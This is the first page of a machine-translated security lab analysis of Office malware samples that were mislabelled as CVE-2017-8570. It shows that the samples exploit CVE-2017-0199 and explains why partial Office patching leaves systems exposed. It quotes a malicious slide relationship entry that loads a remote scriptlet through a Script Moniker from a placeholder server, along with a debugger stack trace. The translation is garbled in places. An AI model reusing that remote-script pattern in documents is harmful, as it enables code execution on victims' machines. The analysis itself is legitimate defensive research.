Oolong CVE-2017-8570 samples and behind the idea-vulnerability warning-the black bar safety net

The so-called CVE-2017-8570 sample
Last week, 360 days eye lab found foreign hackers on Github released a CVE-2017-8570 exploits code, but then deleted, in order to find quite a few labeled as CVE-2017-8570 Office malware samples, such as the following VirusTotal is marked as CVE-2017-8570 sample.
! [](/Article/UploadPic/2017-8/2017811192832900. png? www. myhack58. com)
After 360 days the eye Laboratory of the analysis, we found relevant the use of the code still using the old CVE-2017-0199, rather than the new CVE-2017-8570。 Our analysis is as follows, for peer reference.
The first analysis of the sample in the ppt\slides\_rels\slide1. xml. rels file, rId3 is an OLE object, point to an external link, note that the string ”script:http//[server]/test. sct”, which is important to”script:”and here identifies the next step is to use the Moniker by MkParseDisplayName (The), which is the Script Moniker is.
! [](/Article/UploadPic/2017-8/2017811192833273. png? www. myhack58. com)
While the Script Moniker is exactly what Microsoft 4 month patch to disable out of the two Moniker:
! [](/Article/UploadPic/2017-8/2017811192833131. png? www. myhack58. com)
2017 year 4 months, to fix CVE-2017-0199 disabled when a htafile object and the script object:
Disable the CLSID
ProgID
CVE
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
htafile
CVE-2017-0199
{06290BD3-48AA-11D2-8432-006008C3FBFC}
script
CVE-2017-0199
The following stack structure reflects not hit on the CVE-2017-0199 patch environment the following sample execution of the process:
0:000> k
ChildEBP RetAddr
003c2ea4 6c49d2f5 kernel32! CreateProcessW
003c2f2c 6c49d5f7 wshom! CWshShell::CreateShortcut+0x161
003c2f8c 75753e75 wshom! CWshShell::Exec+0x19a
003c2fac 75753cef OLEAUT32! DispCallFunc+0x165
003c303c 6c4a0267 OLEAUT32! CTypeInfo2::Invoke+0x23f
003c306c 6c4967d5 wshom! CDispatch::Invoke+0x5c
003c3098 7005dc18 wshom! CWshEnvRegistry::Invoke+0x29
003c30d8 7005db6c jscript! IDispatchInvoke2+0xf0
003c3114 7005dadf jscript! IDispatchInvoke+0x6a
003c31d4 7005dc6a jscript! InvokeDispatch+0xa9
003c3200 7005d9a8 jscript! VAR::InvokeByName+0x93
003c324c 7005da4f jscript! VAR::InvokeDispName+0x7d
003c3278 7005e4c7 jscript! VAR::InvokeByDispID+0xce
003c3414 70055d7d jscript! CScriptRuntime::Run+0x2b80
003c34fc 70055cdb jscript! ScrFncObj::CallWithFrameOnStack+0xce
003c3544 70055ef1 jscript! ScrFncObj::Call+0x8d
003c35c0 7005620a jscript! CSession::Execute+0x15f
003c360c 70050399 jscript! COleScript::ExecutePendingScripts+0x1bd
003c362c 7301831f jscript! COleScript::SetScriptState+0x98
003c363c 73018464 tongfang! ScriptEngine::Activate+0x1a
003c3654 730199d3 tongfang! ComScriptlet::Inner::StartEngines+0x6e
003c36a4 7301986e tongfang! ComScriptlet::Inner::Init+0x156
003c36b4 7301980b tongfang! ComScriptlet::New+0x3f
003c36d4 730197d0 tongfang! ComScriptletConstructor::CreateScriptletFromNode+0x26
003c36f4 730237e2 tongfang! ComScriptletConstructor::Create+0x4c
003c3714 73024545 tongfang! ComScriptletFactory::CreateScriptlet+0x1b
003c3734 76fcc6fd tongfang! ComScriptletMoniker::BindToObject+0x4d
003c3760 7708440c ole32! BindMoniker+0x64
003c37e8 770c5c07 ole32! wCreateLinkEx+0x9f
003c3848 770c6137 ole32! OleCreateLinkEx+0xaa
003c3884 713a2f10 ole32! OleCreateLink+0x42
WARNING: Stack unwind information not available. Following frames may be wrong.
003c59c4 7124e908 ppcore! DllGetLCID+0x2b3090
003c6a60 710928e4 ppcore! DllGetLCID+0x15ea88
003c6a90 714adb02 ppcore! PPMain+0x2cf6c
The sample is actually CVE-2017-0199 another using the way to insert htafile or script, instead of CVE-2017-8570 。
CVE-2017-0199 patch trap
For the above this so-called CVE-2017-8570 samples is, in fact, CVE-2017-0199 in we thought we hit the CVE-2017-0199 patch the machine is running, the vulnerability can actually be triggered. After deeper analysis, we found the problem in the patch didn’t hit full on.
Microsoft 4 released in May of CVE-2017-0199 patch is divided into two parts, one is for Office patch（修改MSO.dll A is to Windows patch（主要修改了ole32.dll the two patches must be installed before you can guarantee that is not affected by CVE-2017-0199 impact.
! [](/Article/UploadPic/2017-8/2017811192833796. png? www. myhack58. com)
The red box is part of the Office patches, the blue box part of the Windows System patches.
Windows System patches will mostly be a normal installation, but the Office of whether the patch can be installed properly depending on the current version, Microsoft in the Security Advisory listed in the May patch version of Office are as follows:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Need to note is that Microsoft gives the patch is closely matched to the Office of a large version of a service pack, as Microsoft offers the Microsoft Office 2013 Service Pack 1 patch, and for some earlier versions of Office such as Microsoft Office 2013 will not install CVE-2017-0199 mso patch, you need to first upgrade to the latest SP1 version. There is also that is, all not in the above listed versions of Office are unable to use the normal patched, or will be affected by the 0199 vulnerability, the following are examples.

[1] [2] next